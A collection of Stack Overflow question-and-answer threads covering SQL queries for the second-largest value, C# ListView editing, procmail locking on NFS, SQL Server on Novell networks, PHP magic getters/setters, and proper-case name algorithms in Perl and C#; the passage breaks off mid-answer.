Q: What is the simplest SQL Query to find the second largest value? What is the simplest SQL query to find the second largest integer value in a specific column? There are maybe duplicate values in the column. A: The easiest would be to get the second value from this result set in the application: SELECT DISTINCT value FROM Table ORDER BY value DESC LIMIT 2 But if you must select the second value using SQL, how about: SELECT MIN(value) FROM ( SELECT DISTINCT value FROM Table ORDER BY value DESC LIMIT 2 ) AS t A: SELECT MAX(col) FROM table WHERE col NOT IN ( SELECT MAX(col) FROM table ); A: A very simple query to find the second largest value SELECT `Column` FROM `Table` ORDER BY `Column` DESC LIMIT 1,1; A: you can find the second largest value of column by using the following query SELECT * FROM TableName a WHERE 2 = (SELECT count(DISTINCT(b.ColumnName)) FROM TableName b WHERE a.ColumnName <= b.ColumnName); you can find more details on the following link http://www.abhishekbpatel.com/2012/12/how-to-get-nth-maximum-and-minimun.html A: MSSQL SELECT * FROM [Users] order by UserId desc OFFSET 1 ROW FETCH NEXT 1 ROW ONLY; MySQL SELECT * FROM Users order by UserId desc LIMIT 1 OFFSET 1 No need of sub queries ... just skip one row and select second rows after order by descending A: SELECT MAX(Salary) FROM Employee WHERE Salary NOT IN ( SELECT MAX(Salary) FROM Employee ) This query will return the maximum salary, from the result - which not contains maximum salary from overall table. A: SELECT MAX( col ) FROM table WHERE col < ( SELECT MAX( col ) FROM table ) A: In T-Sql there are two ways: --filter out the max select max( col ) from [table] where col < ( select max( col ) from [table] ) --sort top two then bottom one select top 1 col from ( select top 2 col from [table] order by col) topTwo order by col desc In Microsoft SQL the first way is twice as fast as the second, even if the column in question is clustered. This is because the sort operation is relatively slow compared to the table or index scan that the max aggregation uses. Alternatively, in Microsoft SQL 2005 and above you can use the ROW_NUMBER() function: select col from ( select ROW_NUMBER() over (order by col asc) as 'rowNum', col from [table] ) withRowNum where rowNum = 2 A: Simplest of all select sal from salary order by sal desc limit 1 offset 1 A: Old question I know, but this gave me a better exec plan: SELECT TOP 1 LEAD(MAX (column)) OVER (ORDER BY column desc) FROM TABLE GROUP BY column A: This is very simple code, you can try this :- ex : Table name = test salary 1000 1500 1450 7500 MSSQL Code to get 2nd largest value select salary from test order by salary desc offset 1 rows fetch next 1 rows only; here 'offset 1 rows' means 2nd row of table and 'fetch next 1 rows only' is for show only that 1 row. if you dont use 'fetch next 1 rows only' then it shows all the rows from the second row. A: I see both some SQL Server specific and some MySQL specific solutions here, so you might want to clarify which database you need. Though if I had to guess I'd say SQL Server since this is trivial in MySQL. I also see some solutions that won't work because they fail to take into account the possibility for duplicates, so be careful which ones you accept. Finally, I see a few that will work but that will make two complete scans of the table. You want to make sure the 2nd scan is only looking at 2 values. SQL Server (pre-2012): SELECT MIN([column]) AS [column] FROM ( SELECT TOP 2 [column] FROM [Table] GROUP BY [column] ORDER BY [column] DESC ) a MySQL: SELECT `column` FROM `table` GROUP BY `column` ORDER BY `column` DESC LIMIT 1,1 Update: SQL Server 2012 now supports a much cleaner (and standard) OFFSET/FETCH syntax: SELECT [column] FROM [Table] GROUP BY [column] ORDER BY [column] DESC OFFSET 1 ROWS FETCH NEXT 1 ROWS ONLY; A: I suppose you can do something like: SELECT * FROM Table ORDER BY NumericalColumn DESC LIMIT 1 OFFSET 1 or SELECT * FROM Table ORDER BY NumericalColumn DESC LIMIT (1, 1) depending on your database server. Hint: SQL Server doesn't do LIMIT. A: select * from (select ROW_NUMBER() over (Order by Col_x desc) as Row, Col_1 from table_1)as table_new tn inner join table_1 t1 on tn.col_1 = t1.col_1 where row = 2 Hope this help to get the value for any row..... A: Use this query. SELECT MAX( colname ) FROM Tablename where colname < ( SELECT MAX( colname ) FROM Tablename) A: Tom, believe this will fail when there is more than one value returned in select max([COLUMN_NAME]) from [TABLE_NAME] section. i.e. where there are more than 2 values in the data set. Slight modification to your query will work - select max([COLUMN_NAME]) from [TABLE_NAME] where [COLUMN_NAME] IN ( select max([COLUMN_NAME]) from [TABLE_NAME] ) A: select max(COL_NAME) from TABLE_NAME where COL_NAME in ( select COL_NAME from TABLE_NAME where COL_NAME < ( select max(COL_NAME) from TABLE_NAME ) ); subquery returns all values other than the largest. select the max value from the returned list. A: select min(sal) from emp where sal in (select TOP 2 (sal) from emp order by sal desc) Note sal is col name emp is table name A: select col_name from ( select dense_rank() over (order by col_name desc) as 'rank', col_name from table_name ) withrank where rank = 2 A: SELECT * FROM table WHERE column < (SELECT max(columnq) FROM table) ORDER BY column DESC LIMIT 1 A: This is an another way to find the second largest value of a column.Consider the table 'Student' and column 'Age'.Then the query is, select top 1 Age from Student where Age in ( select distinct top 2 Age from Student order by Age desc ) order by Age asc A: It is the most esiest way: SELECT Column name FROM Table name ORDER BY Column name DESC LIMIT 1,1 A: select age from student group by id having age< ( select max(age) from student ) order by age limit 1 A: As you mentioned duplicate values . In such case you may use DISTINCT and GROUP BY to find out second highest value Here is a table salary : GROUP BY SELECT amount FROM salary GROUP by amount ORDER BY amount DESC LIMIT 1 , 1 DISTINCT SELECT DISTINCT amount FROM salary ORDER BY amount DESC LIMIT 1 , 1 First portion of LIMIT = starting index Second portion of LIMIT = how many value A: SELECT MAX(sal) FROM emp WHERE sal NOT IN ( SELECT top 3 sal FROM emp order by sal desc ) this will return the third highest sal of emp table A: select max(column_name) from table_name where column_name not in ( select max(column_name) from table_name ); not in is a condition that exclude the highest value of column_name. Reference : programmer interview A: select top 1 MyIntColumn from MyTable where MyIntColumn <> (select top 1 MyIntColumn from MyTable order by MyIntColumn desc) order by MyIntColumn desc A: This works in MS SQL: select max([COLUMN_NAME]) from [TABLE_NAME] where [COLUMN_NAME] < ( select max([COLUMN_NAME]) from [TABLE_NAME] ) A: Something like this? I haven't tested it, though: select top 1 x from ( select top 2 distinct x from y order by x desc ) z order by x A: See How to select the nth row in a SQL database table?. Sybase SQL Anywhere supports: SELECT TOP 1 START AT 2 value from table ORDER BY value A: select * from emp e where 3>=(select count(distinct salary) from emp where s.salary<=salary) This query selects the maximum three salaries. If two emp get the same salary this does not affect the query. A: Using a correlated query: Select * from x x1 where 1 = (select count(*) from x where x1.a < a) A: Query to find the 2nd highest number in a row- select Top 1 (salary) from XYZ where Salary not in (select distinct TOP 1(salary) from XYZ order by Salary desc) ORDER BY Salary DESC By changing the highlighted Top 1 to TOP 2, 3 or 4 u can find the 3rd, 4th and 5th highest respectively. A: We can also make use of order by and top 1 element as follows: Select top 1 col_name from table_name where col_name < (Select top 1 col_name from table_name order by col_name desc) order by col_name desc A: SELECT * FROM EMP WHERE salary= (SELECT MAX(salary) FROM EMP WHERE salary != (SELECT MAX(salary) FROM EMP) ); A: Try: select a.* ,b.* from (select * from (select ROW_NUMBER() OVER(ORDER BY fc_amount desc) SrNo1, fc_amount as amount1 From entry group by fc_amount) tbl where tbl.SrNo1 = 2) a , (select * from (select ROW_NUMBER() OVER(ORDER BY fc_amount asc) SrNo2, fc_amount as amount2 From entry group by fc_amount) tbl where tbl.SrNo2 =2) b A: select * from [table] where (column)=(select max(column)from [table] where column < (select max(column)from [table])) A: select MAX(salary) as SecondMax from test where salary !=(select MAX(salary) from test) A: select score from table where score = (select max(score)-1 from table) A: Microsoft SQL Server - Using Two TOPs for the N-th highest value (aliased sub-query). To solve for the 2nd highest: SELECT TOP 1 q.* FROM (SELECT TOP 2 column_name FROM table_name ORDER BY column_name DESC) as q ORDER BY column_name ASC; Uses TOP twice, but requires an aliased sub-query. Essentially, the inner query takes the greatest 2 values in descending order, then the outer query flips in ascending order so that 2nd highest is now on top. The SELECT statement returns this top. To solve for the n-th highest value modify the sub-query TOP value. For example: SELECT TOP 1 q.* FROM (SELECT TOP 5 column_name FROM table_name ORDER BY column_name DESC) as q ORDER BY column_name; Would return the 5th highest value. A: select extension from [dbo].[Employees] order by extension desc offset 2 rows fetch next 1 rows only A: Very Simple. The distinct keyword will take care of duplicates as well. SELECT distinct SupplierID FROM [Products] order by SupplierID desc limit 1 offset 1 A: The easiest way to get second last row from a SQL table is to use ORDER BYColumnNameDESC and set LIMIT 1,1. Try this: SELECT * from `TableName` ORDER BY `ColumnName` DESC LIMIT 1,1 A: SELECT * FROM `employee` WHERE employee_salary = (SELECT employee_salary FROM`employee` GROUP BY employee_salary ORDER BY employee_salary DESC LIMIT 1,1) A: You can find nth highest value using the following query. select top 1 UnitPrice from (select distinct top n UnitPrice from [Order Details] order by UnitPrice desc) as Result order by UnitPrice asc Here, the value of n will be 1 (for the highest number), 2 (for the second highest number), 3 (for the third highest number)... A: At first make a dummy table without max salary then query max value from dummy table SELECT max(salary) from (Select * FROM emp WHERE salary<> (SELECT MAX(salary) from emp)) temp
{ "language": "en", "url": "https://stackoverflow.com/questions/32100", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "200" }
Q: how do you programmatically invoke a listview label edit in C# I'd like to invoke the label edit of a newly added item to a ListView. basically, if I have a click here to add scenario, as soon as the new item is added, I want the text label to be in a user editable state. Thanks! A: found it! ListViewItem::BeginEdit();
{ "language": "en", "url": "https://stackoverflow.com/questions/32103", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "10" }
Q: procmail lockfile utility and NFS Has anyone used the lockfile utility that ships with procmail in conjunction with NFS mounted directories? The lockfile man page states that "Lockfile is NFS-resistant and eight-bit clean." A: I've used it. My company had an very NFS-intensive infrastructure at one point (less so now) and many Perl sysadmin tools dating back to the mid 90s. We wrapped lockfile in a perl module so that we could do consistent locking across NFS mounts. For that matter, our home directories were NFS mounted and we used procmail to deliver mail into them using the same style of locking and never had any problems with it (procmail delivering mail via NFS from server-a and mail being read via firect file access or UW-imap from a bunch of other servers).
{ "language": "en", "url": "https://stackoverflow.com/questions/32123", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "2" }
Q: Why can't SQL Server run on a Novell server? I'm not sure whether I'm asking the question correctly, but I've been told SQL Server cannot run on a Novell server. Is this true? If yes, why not? A: Your problem is your directory service, whether it's Microsoft's Active Directory or Novell's Directory Services (I think it's called). Sounds to me like your DNS is broken if your clients can't resolve names to IP address. A: You may have to be more specific about what a "novell server" is. From what I understand, Novell servers run some form of Suse linux. Sql Server is a windows only product. My company, however, does have clients that run Novell networks, and we do run Sql Servers on their network. But they're hosted on a win box... A: NOW I see your problem! Sorry dude! Yes, VERY easy. Kinda. SQL Server used to be able to talk IPX (the netware protocol) but I think Netware will now talk TCPIP, and you can run IPX and TCP/IP on the same network without an issue - windows clients can run both at the same time, 99% of routers handle all protocols etc. Windows (XP/2003/etc) can run the netware client, so it can talk to shares etc. Use the SQL Server logins (rather than windows integrated logins), and it'll work from anything - we have Java on Linux talking to SQL Server on windows just fine :) It's all in the connection string: userid=username;pwd=whatever;server=yourserverhere; etc. But you MUST use the SQL Server Configuration Manager to set these up - the default is shared memory, so you have to enable TCPIP etc. A: SQL Server is a Windows app. Novel is either one of: Novell or Linux Neither of these are windows :) It's like asking "why can't I run this Mac application on my windows box". Or "why will my petrol car not run on diesel?" There are old version of Sybase, which SQL Server sprang from, which COULD run on Novell Netware, but you'd need to find a software museum to find one, I think! If you need a SQL Server, I'd suggest you either get Small Business Server, which comes with MSSQL, or install one of the free editions of SQL Server on XP or windows 2003 server. Or use something like MySql, Postgress etc on Linux. A: I'm not sure what you are asking. Are you looking for software to allow NetWare applications to talk to a SQL Server running on Windows? The wording of your original question implied that you want SQL Server to run on the NetWare machine. The question of why SQL Server doesn't support NetWare is best asked of Microsoft, but AFAIK SQL Server doesn't support any non-Windows OS. As someone else said, SQL Server originally came from Sybase's SQL Server (now called Adaptive Server Enterprise), which supported NetWare at one time but dropped it a long time ago. Sybase's other RDBMS, SQL Anywhere, dropped NetWare as of version 11, but versions 9 and 10 are still supported on NW. A: OK, now I think I understand. I was thinking "client" as in database client application, not the Novell client. I don't think you'll need the Novell client on the Windows machine, for a couple of reasons: * *If the client is trying to connect over TCP/IP, it doesn't matter whether or not the Windows machine has the Novell client installed *Windows shares aren't affected by the Novell client, though you need some kind of Novell client for the Windows machine to map NetWare volumes *If the Windows machine does need to map NetWare volumes, I have found in the past that the Client Service for NetWare service (which ships with Windows but isn't installed by default) is sufficient, and doesn't have all the overhead of the Novell client. A: It sounds like your Windows SQL Server is in fact a second class citizen on your networks. (I imagine you are using SQL Authentication instead of AD based.) If you have to connect via IP rather than name, then your Windows boxes aren't participating in an Active Directory authentication + DNS setup like is the case in most "windows" networks verus the "netware" network that you are running into. Netware has it's own form of directory services that is independant of Microsoft. If you want your Microsoft SQL Server to be a integral part of your network, then you need Microsoft Active Directory installed with integrated windows authentication and DNS services running on a Domain Controller. But, this would conflict with your directory services (if used) on your netware server. If your Netware network is running just fine, then I wouldn't change it. Simply add the microsoft sql server's network name to your local DNS services and it won't appear like it's a second class citizen. You could install the netware client on the SQL machine but that would make most DBA's cringe. But, it would register the machine in Netware's directory. A: SQL Server, although rooted in a Sybase/Unix/VMS background, is a native windows application. Apart from the compact edition (which runs on some Windows mobile platforms), SQL Server runs on Windows desktop and server operating systems. More informaiton can be found at wikipedia. A: Sorry to be prickly, but I'm not a noob: I know you can't install SQL Server on Linux. Do you guys have customers running Netware trying to connect to a SQL Server? That is what I am dealing with. We have customers, mostly school systems, that use Netware as the "network OS" with many Windows workstations running the Netware client. Our app uses SQL Server which is usually installed on a Windows 2003 server, but the server is always a second class citizen on the network. Users often must use the IP address rather than machine name to connect the SQL Server. @Will: Do your Novell customers have trouble accessing SQL Server on the Windows server? Can you install the Netware client on the Windows server to enable file sharing? A: @Graeme: Thanks for helping me refine my question. My employer somehow has the impression that a Windows server is a second-class citizen on a NetWare network. Would installing the NetWare client on the Windows server make it easier for NetWare clients (with some form of Windows OS) connect to the SQL Server? Would installing the NetWare client on the Windows server allow the server to share directories and files like a Novell server? A: @geoffcc: The app uses SQL Authentication to connect to SQL Server. A: The core issue is how are you authenticating to the SQL database. If you have an Active Directory tree, and an eDirectory you can easily link the two via Novell Identity Manager, which will synchronize users, groups, etc (any object you care to map between the two systems) as well as passwords. Thus the same object exists in both locations so each system can use it as much it needs too. The license for Identity Manager is included with the Open Enterprise Server license (OES can run on Netware or on SUSE Linux Enterprise Server (SLES)). Then you could use the Active Directory integrated authentication. Beyond that, your Netware server likely does not need to connect to the database directly. If it does, you will be writing or using an application that includes the database connectivity. At which point it becomes a question of is there a client for this OS or not. A: @flipdoubt Well if you are using SQL Authentication, then you are using a SQL Client of some kind to connect to it, and the fact you have Novell in the picture is as unrelated as if you had Banyan Vines. (There you go! Now a search will show at least ONE reference to Banyan Vines!! Every good technology site needs at least one, and probably not more than one!) As others have noted, what are you trying to do? If they need to use the IP address of the SQL server to connect to it via a SQL client, then you have a DNS problem. If you want to connect to the MS SQL server box to put a file on it, then that is somewhat unrelated to the SQL aspect of the issue. There again, DNS can solve your woes, if you register the name of the server (Say it is SQLSERV1) with the default DNS name (say acme.com) tacked onto the end of it, so that the IP Name sqlserv1.acme.com resolves to the IP Number you want it to point at. Next comes the question of where are the user identities stored? You are using SQL Authentication, so that means you are creating accounts in SQL for each user. The basic alternatives are to use Active Directory and have MS SQL server use those identities. If you are in a non-AD shop, you can investigate Novell Identity Manager product which has a JDBC driver that can do a fair bit, One thing it can do is synchronize users from eDirectory to be SQL Server users. (Or to Active Directory, Lotus Notes, most LDAP directories, AS400's, mainframes, NIS/NIS+ and many more systems).
{ "language": "en", "url": "https://stackoverflow.com/questions/32144", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "3" }
Q: Is this a reasonable way to handle getters/setters in a PHP class? I'm going to try something with the format of this question and I'm very open to suggestions about a better way to handle it. I didn't want to just dump a bunch of code in the question so I've posted the code for the class on refactormycode. base class for easy class property handling My thought was that people can either post code snippets here or make changes on refactormycode and post links back to their refactorings. I'll make upvotes and accept an answer (assuming there's a clear "winner") based on that. At any rate, on to the class itself: I see a lot of debate about getter/setter class methods and is it better to just access simple property variables directly or should every class have explicit get/set methods defined, blah blah blah. I like the idea of having explicit methods in case you have to add more logic later. Then you don't have to modify any code that uses the class. However I hate having a million functions that look like this: public function getFirstName() { return $this->firstName; } public function setFirstName($firstName) { return $this->firstName; } Now I'm sure I'm not the first person to do this (I'm hoping that there's a better way of doing it that someone can suggest to me). Basically, the PropertyHandler class has a __call magic method. Any methods that come through __call that start with "get" or "set" are then routed to functions that set or retrieve values into an associative array. The key into the array is the name of the calling method after getting or setting. So, if the method coming into __call is "getFirstName", the array key is "FirstName". I liked using __call because it will automatically take care of the case where the subclass already has a "getFirstName" method defined. My impression (and I may be wrong) is that the __get & __set magic methods don't do that. So here's an example of how it would work: class PropTest extends PropertyHandler { public function __construct() { parent::__construct(); } } $props = new PropTest(); $props->setFirstName("Mark"); echo $props->getFirstName(); Notice that PropTest doesn't actually have "setFirstName" or "getFirstName" methods and neither does PropertyHandler. All that's doing is manipulating array values. The other case would be where your subclass is already extending something else. Since you can't have true multiple inheritances in PHP, you can make your subclass have a PropertyHandler instance as a private variable. You have to add one more function but then things behave in exactly the same way. class PropTest2 { private $props; public function __construct() { $this->props = new PropertyHandler(); } public function __call($method, $arguments) { return $this->props->__call($method, $arguments); } } $props2 = new PropTest2(); $props2->setFirstName('Mark'); echo $props2->getFirstName(); Notice how the subclass has a __call method that just passes everything along to the PropertyHandler __call method. Another good argument against handling getters and setters this way is that it makes it really hard to document. In fact, it's basically impossible to use any sort of document generation tool since the explicit methods to be don't documented don't exist. I've pretty much abandoned this approach for now. It was an interesting learning exercise but I think it sacrifices too much clarity. A: The way I do it is the following: class test { protected $x=''; protected $y=''; function set_y ($y) { print "specific function set_y\n"; $this->y = $y; } function __call($function , $args) { print "generic function $function\n"; list ($name , $var ) = split ('_' , $function ); if ($name == 'get' && isset($this->$var)) { return $this->$var; } if ($name == 'set' && isset($this->$var)) { $this->$var= $args[0]; return; } trigger_error ("Fatal error: Call to undefined method test::$function()"); } } $p = new test(); $p->set_x(20); $p->set_y(30); print $p->get_x(); print $p->get_y(); $p->set_z(40); Which will output (line breaks added for clarity) generic function set_x specific function set_y generic function get_x 20 generic function get_y 30 generic function set_z Notice: Fatal error: Call to undefined method set_z() in [...] on line 16 A: @Brian My problem with this is that adding "more logic later" requires that you add blanket logic that applies to all properties accessed with the getter/setter or that you use if or switch statements to evaluate which property you're accessing so that you can apply specific logic. That's not quite true. Take my first example: class PropTest extends PropertyHandler { public function __construct() { parent::__construct(); } } $props = new PropTest(); $props->setFirstName("Mark"); echo $props->getFirstName(); Let's say that I need to add some logic for validating FirstNames. All I have to do is add a setFirstName method to my subclass and that method is automatically used instead. class PropTest extends PropertyHandler { public function __construct() { parent::__construct(); } public function setFirstName($name) { if($name == 'Mark') { echo "I love you, Mark!"; } } } I'm just not satisfied with the limitations that PHP has when it comes to implicit accessor methods. I agree completely. I like the Python way of handling this (my implementation is just a clumsy rip-off of it). A: Yes that's right the variables have to be manually declared but i find that better since I fear a typo in the setter $props2->setFristName('Mark'); will auto-generate a new property (FristName instead of FirstName) which will make debugging harder. A: I like having methods instead of just using public fields, as well, but my problem with PHP's default implementation (using __get() and __set()) or your custom implementation is that you aren't establishing getters and setters on a per-property basis. My problem with this is that adding "more logic later" requires that you add blanket logic that applies to all properties accessed with the getter/setter or that you use if or switch statements to evaluate which property you're accessing so that you can apply specific logic. I like your solution, and I applaud you for it--I'm just not satisfied with the limitations that PHP has when it comes to implicit accessor methods. A: @Mark But even your method requires a fresh declaration of the method, and it somewhat takes away the advantage of putting it in a method so that you can add more logic, because to add more logic requires the old-fashioned declaration of the method, anyway. In its default state (which is where it is impressive in what it detects/does), your technique is offering no advantage (in PHP) over public fields. You're restricting access to the field but giving carte blanche through accessor methods that don't have any restrictions of their own. I'm not aware that unchecked explicit accessors offer any advantage over public fields in any language, but people can and should feel free to correct me if I'm wrong. A: I've always handled this issue in a similar with a __call which ends up pretty much as boiler plate code in many of my classes. However, it's compact, and uses the reflection classes to only add getters / setters for properties you have already set (won't add new ones). Simply adding the getter / setter explicitly will add more complex functionality. It expects to be Code looks like this: /** * Handles default set and get calls */ public function __call($method, $params) { //did you call get or set if ( preg_match( "|^[gs]et([A-Z][\w]+)|", $method, $matches ) ) { //which var? $var = strtolower($matches[1]); $r = new ReflectionClass($this); $properties = $r->getdefaultProperties(); //if it exists if ( array_key_exists($var,$properties) ) { //set if ( 's' == $method[0] ) { $this->$var = $params[0]; } //get elseif ( 'g' == $method[0] ) { return $this->$var; } } } } Adding this to a class where you have declared default properties like: class MyClass { public $myvar = null; } $test = new MyClass; $test->setMyvar = "arapaho"; echo $test->getMyvar; //echos arapaho The reflection class may add something of use to what you were proposing. Neat solution @Mark. A: Just recently, I also thought about handling getters and setters the way you suggested (the second approach was my favorite, i.e. the private $props array), but I discarded it for it wouldn't have worked out in my app. I am working on a rather large SoapServer-based application and the soap interface of PHP 5 injects the values that are transmitted via soap directly into the associated class, without bothering about existing or non-existing properties in the class. A: I can't help putting in my 2 cents... I have taken to using __get and __set in this manor http://gist.github.com/351387 (similar to the way that doctrine does it), then only ever accessing the properties via the $obj->var in an outside of the class. That way you can override functionality as needed instead of making a huge __get or __set function, or overriding __get and __set in the child classes.
{ "language": "en", "url": "https://stackoverflow.com/questions/32145", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "8" }
Q: Does anyone have a good Proper Case algorithm Does anyone have a trusted Proper Case or PCase algorithm (similar to a UCase or Upper)? I'm looking for something that takes a value such as "GEORGE BURDELL" or "george burdell" and turns it into "George Burdell". I have a simple one that handles the simple cases. The ideal would be to have something that can handle things such as "O'REILLY" and turn it into "O'Reilly", but I know that is tougher. I am mainly focused on the English language if that simplifies things. UPDATE: I'm using C# as the language, but I can convert from almost anything (assuming like functionality exists). I agree that the McDonald's scneario is a tough one. I meant to mention that along with my O'Reilly example, but did not in the original post. A: There's also this neat Perl script for title-casing text. http://daringfireball.net/2008/08/title_case_update #!/usr/bin/perl # This filter changes all words to Title Caps, and attempts to be clever # about *un*capitalizing small words like a/an/the in the input. # # The list of "small words" which are not capped comes from # the New York Times Manual of Style, plus 'vs' and 'v'. # # 10 May 2008 # Original version by John Gruber: # http://daringfireball.net/2008/05/title_case # # 28 July 2008 # Re-written and much improved by Aristotle Pagaltzis: # http://plasmasturm.org/code/titlecase/ # # Full change log at __END__. # # License: http://www.opensource.org/licenses/mit-license.php # use strict; use warnings; use utf8; use open qw( :encoding(UTF-8) :std ); my @small_words = qw( (?<!q&)a an and as at(?!&t) but by en for if in of on or the to v[.]? via vs[.]? ); my $small_re = join '|', @small_words; my $apos = qr/ (?: ['’] [[:lower:]]* )? /x; while ( <> ) { s{\A\s+}{}, s{\s+\z}{}; $_ = lc $_ if not /[[:lower:]]/; s{ \b (_*) (?: ( (?<=[ ][/\\]) [[:alpha:]]+ [-_[:alpha:]/\\]+ | # file path or [-_[:alpha:]]+ [@.:] [-_[:alpha:]@.:/]+ $apos ) # URL, domain, or email | ( (?i: $small_re ) $apos ) # or small word (case-insensitive) | ( [[:alpha:]] [[:lower:]'’()\[\]{}]* $apos ) # or word w/o internal caps | ( [[:alpha:]] [[:alpha:]'’()\[\]{}]* $apos ) # or some other word ) (_*) \b }{ $1 . ( defined $2 ? $2 # preserve URL, domain, or email : defined $3 ? "\L$3" # lowercase small word : defined $4 ? "\u\L$4" # capitalize word w/o internal caps : $5 # preserve other kinds of word ) . $6 }xeg; # Exceptions for small words: capitalize at start and end of title s{ ( \A [[:punct:]]* # start of title... | [:.;?!][ ]+ # or of subsentence... | [ ]['"“‘(\[][ ]* ) # or of inserted subphrase... ( $small_re ) \b # ... followed by small word }{$1\u\L$2}xig; s{ \b ( $small_re ) # small word... (?= [[:punct:]]* \Z # ... at the end of the title... | ['"’”)\]] [ ] ) # ... or of an inserted subphrase? }{\u\L$1}xig; # Exceptions for small words in hyphenated compound words ## e.g. "in-flight" -> In-Flight s{ \b (?<! -) # Negative lookbehind for a hyphen; we don't want to match man-in-the-middle but do want (in-flight) ( $small_re ) (?= -[[:alpha:]]+) # lookahead for "-someword" }{\u\L$1}xig; ## # e.g. "Stand-in" -> "Stand-In" (Stand is already capped at this point) s{ \b (?<!…) # Negative lookbehind for a hyphen; we don't want to match man-in-the-middle but do want (stand-in) ( [[:alpha:]]+- ) # $1 = first word and hyphen, should already be properly capped ( $small_re ) # ... followed by small word (?! - ) # Negative lookahead for another '-' }{$1\u$2}xig; print "$_"; } __END__ But it sounds like by proper case you mean.. for people's names only. A: I did a quick C# port of https://github.com/tamtamchik/namecase, which is based on Lingua::EN::NameCase. public static class CIQNameCase { static Dictionary<string, string> _exceptions = new Dictionary<string, string> { {@"\bMacEdo" ,"Macedo"}, {@"\bMacEvicius" ,"Macevicius"}, {@"\bMacHado" ,"Machado"}, {@"\bMacHar" ,"Machar"}, {@"\bMacHin" ,"Machin"}, {@"\bMacHlin" ,"Machlin"}, {@"\bMacIas" ,"Macias"}, {@"\bMacIulis" ,"Maciulis"}, {@"\bMacKie" ,"Mackie"}, {@"\bMacKle" ,"Mackle"}, {@"\bMacKlin" ,"Macklin"}, {@"\bMacKmin" ,"Mackmin"}, {@"\bMacQuarie" ,"Macquarie"} }; static Dictionary<string, string> _replacements = new Dictionary<string, string> { {@"\bAl(?=\s+\w)" , @"al"}, // al Arabic or forename Al. {@"\b(Bin|Binti|Binte)\b" , @"bin"}, // bin, binti, binte Arabic {@"\bAp\b" , @"ap"}, // ap Welsh. {@"\bBen(?=\s+\w)" , @"ben"}, // ben Hebrew or forename Ben. {@"\bDell([ae])\b" , @"dell$1"}, // della and delle Italian. {@"\bD([aeiou])\b" , @"d$1"}, // da, de, di Italian; du French; do Brasil {@"\bD([ao]s)\b" , @"d$1"}, // das, dos Brasileiros {@"\bDe([lrn])\b" , @"de$1"}, // del Italian; der/den Dutch/Flemish. {@"\bEl\b" , @"el"}, // el Greek or El Spanish. {@"\bLa\b" , @"la"}, // la French or La Spanish. {@"\bL([eo])\b" , @"l$1"}, // lo Italian; le French. {@"\bVan(?=\s+\w)" , @"van"}, // van German or forename Van. {@"\bVon\b" , @"von"} // von Dutch/Flemish }; static string[] _conjunctions = { "Y", "E", "I" }; static string _romanRegex = @"\b((?:[Xx]{1,3}|[Xx][Ll]|[Ll][Xx]{0,3})?(?:[Ii]{1,3}|[Ii][VvXx]|[Vv][Ii]{0,3})?)\b"; /// <summary> /// Case a name field into its appropriate case format /// e.g. Smith, de la Cruz, Mary-Jane, O'Brien, McTaggart /// </summary> /// <param name="nameString"></param> /// <returns></returns> public static string NameCase(string nameString) { // Capitalize nameString = Capitalize(nameString); nameString = UpdateIrish(nameString); // Fixes for "son (daughter) of" etc foreach (var replacement in _replacements.Keys) { if (Regex.IsMatch(nameString, replacement)) { Regex rgx = new Regex(replacement); nameString = rgx.Replace(nameString, _replacements[replacement]); } } nameString = UpdateRoman(nameString); nameString = FixConjunction(nameString); return nameString; } /// <summary> /// Capitalize first letters. /// </summary> /// <param name="nameString"></param> /// <returns></returns> private static string Capitalize(string nameString) { nameString = nameString.ToLower(); nameString = Regex.Replace(nameString, @"\b\w", x => x.ToString().ToUpper()); nameString = Regex.Replace(nameString, @"'\w\b", x => x.ToString().ToLower()); // Lowercase 's return nameString; } /// <summary> /// Update for Irish names. /// </summary> /// <param name="nameString"></param> /// <returns></returns> private static string UpdateIrish(string nameString) { if(Regex.IsMatch(nameString, @".*?\bMac[A-Za-z^aciozj]{2,}\b") || Regex.IsMatch(nameString, @".*?\bMc")) { nameString = UpdateMac(nameString); } return nameString; } /// <summary> /// Updates irish Mac & Mc. /// </summary> /// <param name="nameString"></param> /// <returns></returns> private static string UpdateMac(string nameString) { MatchCollection matches = Regex.Matches(nameString, @"\b(Ma?c)([A-Za-z]+)"); if(matches.Count == 1 && matches[0].Groups.Count == 3) { string replacement = matches[0].Groups[1].Value; replacement += matches[0].Groups[2].Value.Substring(0, 1).ToUpper(); replacement += matches[0].Groups[2].Value.Substring(1); nameString = nameString.Replace(matches[0].Groups[0].Value, replacement); // Now fix "Mac" exceptions foreach (var exception in _exceptions.Keys) { nameString = Regex.Replace(nameString, exception, _exceptions[exception]); } } return nameString; } /// <summary> /// Fix roman numeral names. /// </summary> /// <param name="nameString"></param> /// <returns></returns> private static string UpdateRoman(string nameString) { MatchCollection matches = Regex.Matches(nameString, _romanRegex); if (matches.Count > 1) { foreach(Match match in matches) { if(!string.IsNullOrEmpty(match.Value)) { nameString = Regex.Replace(nameString, match.Value, x => x.ToString().ToUpper()); } } } return nameString; } /// <summary> /// Fix Spanish conjunctions. /// </summary> /// <param name=""></param> /// <returns></returns> private static string FixConjunction(string nameString) { foreach (var conjunction in _conjunctions) { nameString = Regex.Replace(nameString, @"\b" + conjunction + @"\b", x => x.ToString().ToLower()); } return nameString; } } Usage string name_cased = CIQNameCase.NameCase("McCarthy"); This is my test method, everything seems to pass OK: [TestMethod] public void Test_NameCase_1() { string[] names = { "Keith", "Yuri's", "Leigh-Williams", "McCarthy", // Mac exceptions "Machin", "Machlin", "Machar", "Mackle", "Macklin", "Mackie", "Macquarie", "Machado", "Macevicius", "Maciulis", "Macias", "MacMurdo", // General "O'Callaghan", "St. John", "von Streit", "van Dyke", "Van", "ap Llwyd Dafydd", "al Fahd", "Al", "el Grecco", "ben Gurion", "Ben", "da Vinci", "di Caprio", "du Pont", "de Legate", "del Crond", "der Sind", "van der Post", "van den Thillart", "von Trapp", "la Poisson", "le Figaro", "Mack Knife", "Dougal MacDonald", "Ruiz y Picasso", "Dato e Iradier", "Mas i Gavarró", // Roman numerals "Henry VIII", "Louis III", "Louis XIV", "Charles II", "Fred XLIX", "Yusof bin Ishak", }; foreach(string name in names) { string name_upper = name.ToUpper(); string name_cased = CIQNameCase.NameCase(name_upper); Console.WriteLine(string.Format("name: {0} -> {1} -> {2}", name, name_upper, name_cased)); Assert.IsTrue(name == name_cased); } } A: I 